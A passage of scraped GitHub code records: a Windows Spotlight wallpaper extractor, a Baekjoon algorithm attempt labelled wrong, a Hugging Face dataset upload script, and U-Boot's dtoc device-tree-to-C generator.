user32.GetSystemMetrics(0)\nf_height = user32.GetSystemMetrics(1)\n\nimages_path = '/AppData/Local/Packages/Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy/LocalState/Assets/'\nextension_convert = '.jpg'\n\n\ndef copy_files():\n source_folder = os.path.expanduser('~') + images_path\n destination_folder = destination\n\n if not os.path.isdir(destination):\n shutil.copytree(source_folder, destination_folder)\n return destination_folder\n else:\n print(\"Folder already exists\")\n\n\ndef convert_to_images():\n for file in os.listdir(destination):\n\n head, tail = os.path.splitext(file)\n if not tail:\n src = os.path.join(destination, file)\n dst = os.path.join(destination, file + extension_convert)\n\n if not os.path.isdir(dst):\n os.rename(src, dst)\n\n\ndef make_folders_by_size():\n names = ['landscape', 'portrait']\n mode = 0o777\n\n for name in names:\n path = os.path.join(destination, name)\n os.mkdir(path, mode)\n\n\ndef group_by_screensize():\n from PIL import Image\n for file in os.listdir(destination):\n im = Image.open(os.path.join(destination, file))\n i_width, i_height = im.size\n im.close()\n if i_width == f_width and i_height == f_height:\n shutil.move(os.path.join(destination, file),\n os.path.join(destination, 'landscape'))\n elif i_width == 
f_height and i_height == f_width:\n shutil.move(os.path.join(destination, file),\n os.path.join(destination, 'portrait'))\n else:\n os.remove(os.path.join(destination, file))\n\n\ndef main():\n copy_files()\n convert_to_images()\n make_folders_by_size()\n group_by_screensize()\n\n\ndestination = raw_input(\"Enter the folder name to save images: \")\ndestination = os.path.join(os.getcwd(), destination)\nmain()","repo_name":"rafaelMMGH/Get-Windows-Lock-Screen-Spotlight","sub_path":"getWallpapers.py","file_name":"getWallpapers.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25873144711","text":"import sys\nsys.setrecursionlimit(1000000)\ndef input():\n return sys.stdin.readline().rstrip()\nsys.stdin = open('22944.in','r')\ndef solution(node,hp,umbrella,dis):\n global result\n x,y = node\n ex,ey = end_node\n end_dis = abs(ex-x) + abs(ey-y)\n if end_dis <= hp + umbrella:\n result = min(result,dis+end_dis)\n return\n for idx in range(umbrella_cnt):\n ux,uy = umbrella_list[idx]\n if not visited_umbrella[idx]:\n next_dis = abs(ux-x) + abs(uy-y)\n if next_dis > umbrella + hp:\n continue\n visited_umbrella[idx] = True\n next_hp = hp - max(0,next_dis-dis)\n solution((ux,uy),next_hp,D,dis+next_dis)\n visited_umbrella[idx] = False\n\nN,H,D = map(int,input().split())\n\narr = []\nstart_node = []\nend_node = []\numbrella_list = []\nfor x in range(N):\n temp = list(input())\n\n for y in range(N):\n if temp[y] == 'S':\n start_node = (x,y)\n elif temp[y] == 'E':\n end_node = (x,y)\n elif temp[y] == 'U':\n umbrella_list.append((x,y))\n arr.append(temp)\nresult = float('inf')\numbrella_cnt = len(umbrella_list)\nvisited_umbrella = [False for _ in range(umbrella_cnt)]\nsolution(start_node,H,0,0)\n\nif result == float('inf'):\n print(-1)\nelse:\n print(result)","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/22944_죽음의_비_wrong.py","file_name":"22944_죽음의_비_wrong.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73650825424","text":"from datasets import load_dataset\n\n\ndef push_dataset():\n example = \"Intent-Classification-Commands\"\n print(\"Example of database name (you can name it anything): \", example)\n dataset_id = input(\"Enter your dataset name (huggingface): \")\n dataset = load_dataset('csv', data_files={'train': f'dataset_folder/train.csv', 'test': f'dataset_folder/test.csv'},\n encoding=\"ISO-8859-1\")\n dataset.push_to_hub(dataset_id)\n\n\nif __name__ == '__main__':\n push_dataset()\n","repo_name":"Dipeshpal/Intent-Classification-small-transformers","sub_path":"push_to_hub.py","file_name":"push_to_hub.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41355547308","text":"import collections\nimport copy\nfrom enum import IntEnum\nimport os\nimport re\nimport sys\n\nfrom dtoc import fdt\nfrom dtoc import fdt_util\nfrom dtoc import src_scan\nfrom dtoc.src_scan import conv_name_to_c\n\n# When we see these properties we ignore them - i.e. 
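# The orientation test in the wallpaper script above, folded into one helper
# (hypothetical; screen_w/screen_h stand in for the GetSystemMetrics values):
from PIL import Image

def classify_orientation(path, screen_w, screen_h):
    with Image.open(path) as im:
        w, h = im.size
    if (w, h) == (screen_w, screen_h):
        return "landscape"
    if (w, h) == (screen_h, screen_w):
        return "portrait"
    return None              # anything else gets deleted by the script

# e.g. classify_orientation("wall.jpg", 1920, 1080) -> "landscape"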
do not create a structure\n# member\nPROP_IGNORE_LIST = [\n '#address-cells',\n '#gpio-cells',\n '#size-cells',\n 'compatible',\n 'linux,phandle',\n \"status\",\n 'phandle',\n 'bootph-all',\n 'bootph-pre-sram',\n 'bootph-pre-ram',\n]\n\n# C type declarations for the types we support\nTYPE_NAMES = {\n fdt.Type.INT: 'fdt32_t',\n fdt.Type.BYTE: 'unsigned char',\n fdt.Type.STRING: 'const char *',\n fdt.Type.BOOL: 'bool',\n fdt.Type.INT64: 'fdt64_t',\n}\n\nSTRUCT_PREFIX = 'dtd_'\nVAL_PREFIX = 'dtv_'\n\n# Properties which are considered to be phandles\n# key: property name\n# value: name of associated #cells property in the target node\n#\n# New phandle properties must be added here; otherwise they will come through as\n# simple integers and finding devices by phandle will not work.\n# Any property that ends with one of these (e.g. 'cd-gpios') will be considered\n# a phandle property.\nPHANDLE_PROPS = {\n 'clocks': '#clock-cells',\n 'interrupts-extended': '#interrupt-cells',\n 'gpios': '#gpio-cells',\n 'sandbox,emul': '#emul-cells',\n }\n\nclass Ftype(IntEnum):\n SOURCE, HEADER = range(2)\n\n\n# This holds information about each type of output file dtoc can create\n# ftype: Type of file (Ftype)\n# fname: Filename excluding directory, e.g. 'dt-plat.c'\n# hdr_comment: Comment explaining the purpose of the file\nOutputFile = collections.namedtuple('OutputFile',\n ['ftype', 'fname', 'method', 'hdr_comment'])\n\n# This holds information about a property which includes phandles.\n#\n# max_args: integer: Maximum number or arguments that any phandle uses (int).\n# args: Number of args for each phandle in the property. The total number of\n# phandles is len(args). This is a list of integers.\nPhandleInfo = collections.namedtuple('PhandleInfo', ['max_args', 'args'])\n\n# Holds a single phandle link, allowing a C struct value to be assigned to point\n# to a device\n#\n# var_node: C variable to assign (e.g. 'dtv_mmc.clocks[0].node')\n# dev_name: Name of device to assign to (e.g. 'clock')\nPhandleLink = collections.namedtuple('PhandleLink', ['var_node', 'dev_name'])\n\n\ndef tab_to(num_tabs, line):\n \"\"\"Append tabs to a line of text to reach a tab stop.\n\n Args:\n num_tabs (int): Tab stop to obtain (0 = column 0, 1 = column 8, etc.)\n line (str): Line of text to append to\n\n Returns:\n str: line with the correct number of tabs appeneded. If the line already\n extends past that tab stop then a single space is appended.\n \"\"\"\n if len(line) >= num_tabs * 8:\n return line + ' '\n return line + '\\t' * (num_tabs - len(line) // 8)\n\ndef get_value(ftype, value):\n \"\"\"Get a value as a C expression\n\n For integers this returns a byte-swapped (little-endian) hex string\n For bytes this returns a hex string, e.g. 
0x12\n For strings this returns a literal string enclosed in quotes\n For booleans this return 'true'\n\n Args:\n ftype (fdt.Type): Data type (fdt_util)\n value (bytes): Data value, as a string of bytes\n\n Returns:\n str: String representation of the value\n \"\"\"\n if ftype == fdt.Type.INT:\n val = '%#x' % fdt_util.fdt32_to_cpu(value)\n elif ftype == fdt.Type.BYTE:\n char = value[0]\n val = '%#x' % (ord(char) if isinstance(char, str) else char)\n elif ftype == fdt.Type.STRING:\n # Handle evil ACPI backslashes by adding another backslash before them.\n # So \"\\\\_SB.GPO0\" in the device tree effectively stays like that in C\n val = '\"%s\"' % value.replace('\\\\', '\\\\\\\\')\n elif ftype == fdt.Type.BOOL:\n val = 'true'\n else: # ftype == fdt.Type.INT64:\n val = '%#x' % value\n return val\n\n\nclass DtbPlatdata():\n \"\"\"Provide a means to convert device tree binary data to platform data\n\n The output of this process is C structures which can be used in space-\n constrained encvironments where the ~3KB code overhead of device tree\n code is not affordable.\n\n Properties:\n _scan: Scan object, for scanning and reporting on useful information\n from the U-Boot source code\n _fdt: Fdt object, referencing the device tree\n _dtb_fname: Filename of the input device tree binary file\n _valid_nodes_unsorted: A list of Node object with compatible strings,\n ordered by devicetree node order\n _valid_nodes: A list of Node object with compatible strings, ordered by\n conv_name_to_c(node.name)\n _include_disabled: true to include nodes marked status = \"disabled\"\n _outfile: The current output file (sys.stdout or a real file)\n _lines: Stashed list of output lines for outputting in the future\n _dirname: Directory to hold output files, or None for none (all files\n go to stdout)\n _struct_data (dict): OrderedDict of dtplat structures to output\n key (str): Node name, as a C identifier\n value: dict containing structure fields:\n key (str): Field name\n value: Prop object with field information\n _basedir (str): Base directory of source tree\n _valid_uclasses (list of src_scan.Uclass): List of uclasses needed for\n the selected devices (see _valid_node), in alphabetical order\n _instantiate: Instantiate devices so they don't need to be bound at\n run-time\n \"\"\"\n def __init__(self, scan, dtb_fname, include_disabled, instantiate=False):\n self._scan = scan\n self._fdt = None\n self._dtb_fname = dtb_fname\n self._valid_nodes = None\n self._valid_nodes_unsorted = None\n self._include_disabled = include_disabled\n self._outfile = None\n self._lines = []\n self._dirnames = [None] * len(Ftype)\n self._struct_data = collections.OrderedDict()\n self._basedir = None\n self._valid_uclasses = None\n self._instantiate = instantiate\n\n def setup_output_dirs(self, output_dirs):\n \"\"\"Set up the output directories\n\n This should be done before setup_output() is called\n\n Args:\n output_dirs (tuple of str):\n Directory to use for C output files.\n Use None to write files relative current directory\n Directory to use for H output files.\n Defaults to the C output dir\n \"\"\"\n def process_dir(ftype, dirname):\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n self._dirnames[ftype] = dirname\n\n if output_dirs:\n c_dirname = output_dirs[0]\n h_dirname = output_dirs[1] if len(output_dirs) > 1 else c_dirname\n process_dir(Ftype.SOURCE, c_dirname)\n process_dir(Ftype.HEADER, h_dirname)\n\n def setup_output(self, ftype, fname):\n \"\"\"Set up the output destination\n\n Once this is done, future calls to 
self.out() will output to this\n file. The file used is as follows:\n\n self._dirnames[ftype] is None: output to fname, or stdout if None\n self._dirnames[ftype] is not None: output to fname in that directory\n\n Calling this function multiple times will close the old file and open\n the new one. If they are the same file, nothing happens and output will\n continue to the same file.\n\n Args:\n ftype (str): Type of file to create ('c' or 'h')\n fname (str): Filename to send output to. If there is a directory in\n self._dirnames for this file type, it will be put in that\n directory\n \"\"\"\n dirname = self._dirnames[ftype]\n if dirname:\n pathname = os.path.join(dirname, fname)\n if self._outfile:\n self._outfile.close()\n self._outfile = open(pathname, 'w')\n elif fname:\n if not self._outfile:\n self._outfile = open(fname, 'w')\n else:\n self._outfile = sys.stdout\n\n def finish_output(self):\n \"\"\"Finish outputing to a file\n\n This closes the output file, if one is in use\n \"\"\"\n if self._outfile != sys.stdout:\n self._outfile.close()\n self._outfile = None\n\n def out(self, line):\n \"\"\"Output a string to the output file\n\n Args:\n line (str): String to output\n \"\"\"\n self._outfile.write(line)\n\n def buf(self, line):\n \"\"\"Buffer up a string to send later\n\n Args:\n line (str): String to add to our 'buffer' list\n \"\"\"\n self._lines.append(line)\n\n def get_buf(self):\n \"\"\"Get the contents of the output buffer, and clear it\n\n Returns:\n list(str): The output buffer, which is then cleared for future use\n \"\"\"\n lines = self._lines\n self._lines = []\n return lines\n\n def out_header(self, outfile):\n \"\"\"Output a message indicating that this is an auto-generated file\n\n Args:\n outfile: OutputFile describing the file being generated\n \"\"\"\n self.out('''/*\n * DO NOT MODIFY\n *\n * %s.\n * This was generated by dtoc from a .dtb (device tree binary) file.\n */\n\n''' % outfile.hdr_comment)\n\n def get_phandle_argc(self, prop, node_name):\n \"\"\"Check if a node contains phandles\n\n We have no reliable way of detecting whether a node uses a phandle\n or not. As an interim measure, use a list of known property names.\n\n Args:\n prop (fdt.Prop): Prop object to check\n node_name (str): Node name, only used for raising an error\n Returns:\n int or None: Number of argument cells is this is a phandle,\n else None\n Raises:\n ValueError: if the phandle cannot be parsed or the required property\n is not present\n \"\"\"\n cells_prop = None\n for name, cprop in PHANDLE_PROPS.items():\n if prop.name.endswith(name):\n cells_prop = cprop\n if cells_prop:\n if not isinstance(prop.value, list):\n prop.value = [prop.value]\n val = prop.value\n i = 0\n\n max_args = 0\n args = []\n while i < len(val):\n phandle = fdt_util.fdt32_to_cpu(val[i])\n # If we get to the end of the list, stop. This can happen\n # since some nodes have more phandles in the list than others,\n # but we allocate enough space for the largest list. 
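# Standalone sketch of the phandle walk in get_phandle_argc above: the cell
# list is consumed as (phandle, arg0 .. argN-1) groups, where N comes from
# the target node's #cells property (faked here as a plain dict), and a zero
# phandle terminates the list early.
cells = [1, 100, 2, 200, 201, 0]    # phandle 1 takes 1 arg, phandle 2 takes 2
num_args_for = {1: 1, 2: 2}         # stand-in for the #clock-cells lookup

args, max_args, i = [], 0, 0
while i < len(cells):
    phandle = cells[i]
    if not phandle:                 # zero padding at the end of the list
        break
    n = num_args_for[phandle]
    max_args = max(max_args, n)
    args.append(n)
    i += 1 + n
print(max_args, args)               # 2 [1, 2]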
So those\n # nodes with shorter lists end up with zeroes at the end.\n if not phandle:\n break\n target = self._fdt.phandle_to_node.get(phandle)\n if not target:\n raise ValueError(\"Cannot parse '%s' in node '%s'\" %\n (prop.name, node_name))\n cells = target.props.get(cells_prop)\n if not cells:\n raise ValueError(\"Node '%s' has no cells property\" %\n target.name)\n num_args = fdt_util.fdt32_to_cpu(cells.value)\n max_args = max(max_args, num_args)\n args.append(num_args)\n i += 1 + num_args\n return PhandleInfo(max_args, args)\n return None\n\n def scan_dtb(self):\n \"\"\"Scan the device tree to obtain a tree of nodes and properties\n\n Once this is done, self._fdt.GetRoot() can be called to obtain the\n device tree root node, and progress from there.\n \"\"\"\n self._fdt = fdt.FdtScan(self._dtb_fname)\n\n def scan_node(self, node, valid_nodes):\n \"\"\"Scan a node and subnodes to build a tree of node and phandle info\n\n This adds each subnode to self._valid_nodes if it is enabled and has a\n compatible string.\n\n Args:\n node (Node): Node for scan for subnodes\n valid_nodes (list of Node): List of Node objects to add to\n \"\"\"\n for subnode in node.subnodes:\n if 'compatible' in subnode.props:\n status = subnode.props.get('status')\n if (not self._include_disabled and not status or\n status.value != 'disabled'):\n valid_nodes.append(subnode)\n\n # recurse to handle any subnodes\n self.scan_node(subnode, valid_nodes)\n\n def scan_tree(self, add_root):\n \"\"\"Scan the device tree for useful information\n\n This fills in the following properties:\n _valid_nodes_unsorted: A list of nodes we wish to consider include\n in the platform data (in devicetree node order)\n _valid_nodes: Sorted version of _valid_nodes_unsorted\n\n Args:\n add_root: True to add the root node also (which wouldn't normally\n be added as it may not have a compatible string)\n \"\"\"\n root = self._fdt.GetRoot()\n valid_nodes = []\n if add_root:\n valid_nodes.append(root)\n self.scan_node(root, valid_nodes)\n self._valid_nodes_unsorted = valid_nodes\n self._valid_nodes = sorted(valid_nodes,\n key=lambda x: conv_name_to_c(x.name))\n\n def prepare_nodes(self):\n \"\"\"Add extra properties to the nodes we are using\n\n The following properties are added for use by dtoc:\n idx: Index number of this node (0=first, etc.)\n struct_name: Name of the struct dtd used by this node\n var_name: C name for this node\n child_devs: List of child devices for this node, each a None\n child_refs: Dict of references for each child:\n key: Position in child list (-1=head, 0=first, 1=second, ...\n n-1=last, n=head)\n seq: Sequence number of the device (unique within its uclass), or\n -1 not not known yet\n dev_ref: Reference to this device, e.g. 
'DM_DEVICE_REF(serial)'\n driver: Driver record for this node, or None if not known\n uclass: Uclass record for this node, or None if not known\n uclass_seq: Position of this device within the uclass list (0=first,\n n-1=last)\n parent_seq: Position of this device within it siblings (0=first,\n n-1=last)\n parent_driver: Driver record of the node's parent, or None if none.\n We don't use node.parent.driver since node.parent may not be in\n the list of valid nodes\n \"\"\"\n for idx, node in enumerate(self._valid_nodes):\n node.idx = idx\n node.struct_name, _ = self._scan.get_normalized_compat_name(node)\n node.var_name = conv_name_to_c(node.name)\n node.child_devs = []\n node.child_refs = {}\n node.seq = -1\n node.dev_ref = None\n node.driver = None\n node.uclass = None\n node.uclass_seq = None\n node.parent_seq = None\n node.parent_driver = None\n\n @staticmethod\n def get_num_cells(node):\n \"\"\"Get the number of cells in addresses and sizes for this node\n\n Args:\n node (fdt.None): Node to check\n\n Returns:\n Tuple:\n Number of address cells for this node\n Number of size cells for this node\n \"\"\"\n parent = node.parent\n if parent and not parent.props:\n raise ValueError(\"Parent node '%s' has no properties - do you need bootph-pre-ram or similar?\" %\n parent.path)\n num_addr, num_size = 2, 2\n if parent:\n addr_prop = parent.props.get('#address-cells')\n size_prop = parent.props.get('#size-cells')\n if addr_prop:\n num_addr = fdt_util.fdt32_to_cpu(addr_prop.value)\n if size_prop:\n num_size = fdt_util.fdt32_to_cpu(size_prop.value)\n return num_addr, num_size\n\n def scan_reg_sizes(self):\n \"\"\"Scan for 64-bit 'reg' properties and update the values\n\n This finds 'reg' properties with 64-bit data and converts the value to\n an array of 64-values. This allows it to be output in a way that the\n C code can read.\n \"\"\"\n for node in self._valid_nodes:\n reg = node.props.get('reg')\n if not reg:\n continue\n num_addr, num_size = self.get_num_cells(node)\n total = num_addr + num_size\n\n if reg.type != fdt.Type.INT:\n raise ValueError(\"Node '%s' reg property is not an int\" %\n node.name)\n if not isinstance(reg.value, list):\n reg.value = [reg.value]\n if len(reg.value) % total:\n raise ValueError(\n \"Node '%s' (parent '%s') reg property has %d cells \"\n 'which is not a multiple of na + ns = %d + %d)' %\n (node.name, node.parent.name, len(reg.value), num_addr,\n num_size))\n reg.num_addr = num_addr\n reg.num_size = num_size\n if num_addr > 1 or num_size > 1:\n reg.type = fdt.Type.INT64\n i = 0\n new_value = []\n val = reg.value\n while i < len(val):\n addr = fdt_util.fdt_cells_to_cpu(val[i:], reg.num_addr)\n i += num_addr\n size = fdt_util.fdt_cells_to_cpu(val[i:], reg.num_size)\n i += num_size\n new_value += [addr, size]\n reg.value = new_value\n\n def scan_structs(self):\n \"\"\"Scan the device tree building up the C structures we will use.\n\n Build a dict keyed by C struct name containing a dict of Prop\n object for each struct field (keyed by property name). Where the\n same struct appears multiple times, try to use the 'widest'\n property, i.e. 
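# The reg parsing above pairs #address-cells address words with #size-cells
# size words; each group of 32-bit cells folds into one integer, roughly what
# fdt_util.fdt_cells_to_cpu does (the reg values here are illustrative only):
def cells_to_cpu(cells, num):
    val = 0
    for cell in cells[:num]:
        val = (val << 32) | cell
    return val

reg = [0x1, 0x2000, 0x0, 0x1000]    # hypothetical reg with na = ns = 2
addr = cells_to_cpu(reg, 2)
size = cells_to_cpu(reg[2:], 2)
print(hex(addr), hex(size))         # 0x100002000 0x1000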
the one with a type which can express all others.\n\n Once the widest property is determined, all other properties are\n updated to match that width.\n\n The results are written to self._struct_data\n \"\"\"\n structs = self._struct_data\n for node in self._valid_nodes:\n fields = {}\n\n # Get a list of all the valid properties in this node.\n for name, prop in node.props.items():\n if name not in PROP_IGNORE_LIST and name[0] != '#':\n fields[name] = copy.deepcopy(prop)\n\n # If we've seen this struct_name before, update the existing struct\n if node.struct_name in structs:\n struct = structs[node.struct_name]\n for name, prop in fields.items():\n oldprop = struct.get(name)\n if oldprop:\n oldprop.Widen(prop)\n else:\n struct[name] = prop\n\n # Otherwise store this as a new struct.\n else:\n structs[node.struct_name] = fields\n\n for node in self._valid_nodes:\n struct = structs[node.struct_name]\n for name, prop in node.props.items():\n if name not in PROP_IGNORE_LIST and name[0] != '#':\n prop.Widen(struct[name])\n\n def scan_phandles(self):\n \"\"\"Figure out what phandles each node uses\n\n We need to be careful when outputing nodes that use phandles since\n they must come after the declaration of the phandles in the C file.\n Otherwise we get a compiler error since the phandle struct is not yet\n declared.\n\n This function adds to each node a list of phandle nodes that the node\n depends on. This allows us to output things in the right order.\n \"\"\"\n for node in self._valid_nodes:\n node.phandles = set()\n for pname, prop in node.props.items():\n if pname in PROP_IGNORE_LIST or pname[0] == '#':\n continue\n info = self.get_phandle_argc(prop, node.name)\n if info:\n # Process the list as pairs of (phandle, id)\n pos = 0\n for args in info.args:\n phandle_cell = prop.value[pos]\n phandle = fdt_util.fdt32_to_cpu(phandle_cell)\n target_node = self._fdt.phandle_to_node[phandle]\n node.phandles.add(target_node)\n pos += 1 + args\n\n\n def generate_structs(self):\n \"\"\"Generate struct defintions for the platform data\n\n This writes out the body of a header file consisting of structure\n definitions for node in self._valid_nodes. 
See the documentation in\n doc/driver-model/of-plat.rst for more information.\n \"\"\"\n structs = self._struct_data\n self.out('#include \\n')\n self.out('#include \\n')\n\n # Output the struct definition\n for name in sorted(structs):\n self.out('struct %s%s {\\n' % (STRUCT_PREFIX, name))\n for pname in sorted(structs[name]):\n prop = structs[name][pname]\n info = self.get_phandle_argc(prop, structs[name])\n if info:\n # For phandles, include a reference to the target\n struct_name = 'struct phandle_%d_arg' % info.max_args\n self.out('\\t%s%s[%d]' % (tab_to(2, struct_name),\n conv_name_to_c(prop.name),\n len(info.args)))\n else:\n ptype = TYPE_NAMES[prop.type]\n self.out('\\t%s%s' % (tab_to(2, ptype),\n conv_name_to_c(prop.name)))\n if isinstance(prop.value, list):\n self.out('[%d]' % len(prop.value))\n self.out(';\\n')\n self.out('};\\n')\n\n def _output_list(self, node, prop):\n \"\"\"Output the C code for a devicetree property that holds a list\n\n Args:\n node (fdt.Node): Node to output\n prop (fdt.Prop): Prop to output\n \"\"\"\n self.buf('{')\n vals = []\n # For phandles, output a reference to the platform data\n # of the target node.\n info = self.get_phandle_argc(prop, node.name)\n if info:\n # Process the list as pairs of (phandle, id)\n pos = 0\n for args in info.args:\n phandle_cell = prop.value[pos]\n phandle = fdt_util.fdt32_to_cpu(phandle_cell)\n target_node = self._fdt.phandle_to_node[phandle]\n arg_values = []\n for i in range(args):\n arg_values.append(\n str(fdt_util.fdt32_to_cpu(prop.value[pos + 1 + i])))\n pos += 1 + args\n vals.append('\\t{%d, {%s}}' % (target_node.idx,\n ', '.join(arg_values)))\n for val in vals:\n self.buf('\\n\\t\\t%s,' % val)\n else:\n for val in prop.value:\n vals.append(get_value(prop.type, val))\n\n # Put 8 values per line to avoid very long lines.\n for i in range(0, len(vals), 8):\n if i:\n self.buf(',\\n\\t\\t')\n self.buf(', '.join(vals[i:i + 8]))\n self.buf('}')\n\n def _declare_device(self, node):\n \"\"\"Add a device declaration to the output\n\n This declares a U_BOOT_DRVINFO() for the device being processed\n\n Args:\n node: Node to process\n \"\"\"\n self.buf('U_BOOT_DRVINFO(%s) = {\\n' % node.var_name)\n self.buf('\\t.name\\t\\t= \"%s\",\\n' % node.struct_name)\n self.buf('\\t.plat\\t\\t= &%s%s,\\n' % (VAL_PREFIX, node.var_name))\n self.buf('\\t.plat_size\\t= sizeof(%s%s),\\n' %\n (VAL_PREFIX, node.var_name))\n idx = -1\n if node.parent and node.parent in self._valid_nodes:\n idx = node.parent.idx\n self.buf('\\t.parent_idx\\t= %d,\\n' % idx)\n self.buf('};\\n')\n self.buf('\\n')\n\n def prep_priv(self, struc, name, suffix, section='.priv_data'):\n if not struc:\n return None\n var_name = '_%s%s' % (name, suffix)\n hdr = self._scan._structs.get(struc)\n if hdr:\n self.buf('#include <%s>\\n' % hdr.fname)\n else:\n print('Warning: Cannot find header file for struct %s' % struc)\n attr = '__attribute__ ((section (\"%s\")))' % section\n return var_name, struc, attr\n\n def alloc_priv(self, info, name, extra, suffix='_priv'):\n result = self.prep_priv(info, name, suffix)\n if not result:\n return None\n var_name, struc, section = result\n self.buf('u8 %s_%s[sizeof(struct %s)]\\n\\t%s;\\n' %\n (var_name, extra, struc.strip(), section))\n return '%s_%s' % (var_name, extra)\n\n def alloc_plat(self, info, name, extra, node):\n result = self.prep_priv(info, name, '_plat')\n if not result:\n return None\n var_name, struc, section = result\n self.buf('struct %s %s\\n\\t%s_%s = {\\n' %\n (struc.strip(), section, var_name, extra))\n 
self.buf('\\t.dtplat = {\\n')\n for pname in sorted(node.props):\n self._output_prop(node, node.props[pname], 2)\n self.buf('\\t},\\n')\n self.buf('};\\n')\n return '&%s_%s' % (var_name, extra)\n\n def _declare_device_inst(self, node, parent_driver):\n \"\"\"Add a device instance declaration to the output\n\n This declares a DM_DEVICE_INST() for the device being processed\n\n Args:\n node: Node to output\n \"\"\"\n driver = node.driver\n uclass = node.uclass\n self.buf('\\n')\n num_lines = len(self._lines)\n plat_name = self.alloc_plat(driver.plat, driver.name, node.var_name,\n node)\n priv_name = self.alloc_priv(driver.priv, driver.name, node.var_name)\n parent_plat_name = None\n parent_priv_name = None\n if parent_driver:\n # TODO: deal with uclass providing these values\n parent_plat_name = self.alloc_priv(\n parent_driver.child_plat, driver.name, node.var_name,\n '_parent_plat')\n parent_priv_name = self.alloc_priv(\n parent_driver.child_priv, driver.name, node.var_name,\n '_parent_priv')\n uclass_plat_name = self.alloc_priv(\n uclass.per_dev_plat, driver.name + '_uc', node.var_name, 'plat')\n uclass_priv_name = self.alloc_priv(uclass.per_dev_priv,\n driver.name + '_uc', node.var_name)\n for hdr in driver.headers:\n self.buf('#include %s\\n' % hdr)\n\n # Add a blank line if we emitted any stuff above, for readability\n if num_lines != len(self._lines):\n self.buf('\\n')\n\n self.buf('DM_DEVICE_INST(%s) = {\\n' % node.var_name)\n self.buf('\\t.driver\\t\\t= DM_DRIVER_REF(%s),\\n' % node.struct_name)\n self.buf('\\t.name\\t\\t= \"%s\",\\n' % node.struct_name)\n if plat_name:\n self.buf('\\t.plat_\\t\\t= %s,\\n' % plat_name)\n else:\n self.buf('\\t.plat_\\t\\t= &%s%s,\\n' % (VAL_PREFIX, node.var_name))\n if parent_plat_name:\n self.buf('\\t.parent_plat_\\t= %s,\\n' % parent_plat_name)\n if uclass_plat_name:\n self.buf('\\t.uclass_plat_\\t= %s,\\n' % uclass_plat_name)\n driver_data = None\n\n if node != self._fdt.GetRoot():\n compat_list = node.props['compatible'].value\n if not isinstance(compat_list, list):\n compat_list = [compat_list]\n for compat in compat_list:\n driver_data = driver.compat.get(compat)\n if driver_data:\n self.buf('\\t.driver_data\\t= %s,\\n' % driver_data)\n break\n\n if node.parent and node.parent.parent:\n if node.parent not in self._valid_nodes:\n # This might indicate that the parent node is not in the\n # SPL/TPL devicetree but the child is. For example if we are\n # dealing with of-platdata in TPL, the parent has a\n # bootph-pre-sram tag but the child has bootph-all.
In\n # this case the child node exists in TPL but the parent does\n # not.\n raise ValueError(\"Node '%s' requires parent node '%s' but it is not in the valid list\" %\n (node.path, node.parent.path))\n self.buf('\\t.parent\\t\\t= DM_DEVICE_REF(%s),\\n' %\n node.parent.var_name)\n if priv_name:\n self.buf('\\t.priv_\\t\\t= %s,\\n' % priv_name)\n self.buf('\\t.uclass\\t\\t= DM_UCLASS_REF(%s),\\n' % uclass.name)\n\n if uclass_priv_name:\n self.buf('\\t.uclass_priv_ = %s,\\n' % uclass_priv_name)\n if parent_priv_name:\n self.buf('\\t.parent_priv_\\t= %s,\\n' % parent_priv_name)\n self.list_node('uclass_node', uclass.node_refs, node.uclass_seq)\n self.list_head('child_head', 'sibling_node', node.child_devs, node.var_name)\n if node.parent in self._valid_nodes:\n self.list_node('sibling_node', node.parent.child_refs,\n node.parent_seq)\n # flags is left as 0\n\n self.buf('\\t.seq_ = %d,\\n' % node.seq)\n\n self.buf('};\\n')\n self.buf('\\n')\n return parent_plat_name\n\n def _output_prop(self, node, prop, tabs=1):\n \"\"\"Output a line containing the value of a struct member\n\n Args:\n node (Node): Node being output\n prop (Prop): Prop object to output\n \"\"\"\n if prop.name in PROP_IGNORE_LIST or prop.name[0] == '#':\n return\n member_name = conv_name_to_c(prop.name)\n self.buf('%s%s= ' % ('\\t' * tabs, tab_to(3, '.' + member_name)))\n\n # Special handling for lists\n if isinstance(prop.value, list):\n self._output_list(node, prop)\n else:\n self.buf(get_value(prop.type, prop.value))\n self.buf(',\\n')\n\n def _output_values(self, node):\n \"\"\"Output the definition of a device's struct values\n\n Args:\n node (Node): Node to output\n \"\"\"\n self.buf('static struct %s%s %s%s = {\\n' %\n (STRUCT_PREFIX, node.struct_name, VAL_PREFIX, node.var_name))\n for pname in sorted(node.props):\n self._output_prop(node, node.props[pname])\n self.buf('};\\n')\n\n def list_head(self, head_member, node_member, node_refs, var_name):\n self.buf('\\t.%s\\t= {\\n' % head_member)\n if node_refs:\n last = node_refs[-1].dev_ref\n first = node_refs[0].dev_ref\n member = node_member\n else:\n last = 'DM_DEVICE_REF(%s)' % var_name\n first = last\n member = head_member\n self.buf('\\t\\t.prev = &%s->%s,\\n' % (last, member))\n self.buf('\\t\\t.next = &%s->%s,\\n' % (first, member))\n self.buf('\\t},\\n')\n\n def list_node(self, member, node_refs, seq):\n self.buf('\\t.%s\\t= {\\n' % member)\n self.buf('\\t\\t.prev = %s,\\n' % node_refs[seq - 1])\n self.buf('\\t\\t.next = %s,\\n' % node_refs[seq + 1])\n self.buf('\\t},\\n')\n\n def generate_uclasses(self):\n self.out('\\n')\n self.out('#include <common.h>\\n')\n self.out('#include <dm.h>\\n')\n self.out('#include <dt-structs.h>\\n')\n self.out('\\n')\n self.buf('/*\\n')\n self.buf(\n \" * uclass declarations, ordered by 'struct uclass' linker_list idx:\\n\")\n uclass_list = self._valid_uclasses\n for seq, uclass in enumerate(uclass_list):\n self.buf(' * %3d: %s\\n' % (seq, uclass.name))\n self.buf(' *\\n')\n self.buf(' * Sequence numbers allocated in each uclass:\\n')\n for uclass in uclass_list:\n if uclass.alias_num_to_node:\n self.buf(' * %s: %s\\n' % (uclass.name, uclass.uclass_id))\n for seq, node in uclass.alias_num_to_node.items():\n self.buf(' * %d: %s\\n' % (seq, node.path))\n self.buf(' */\\n')\n\n 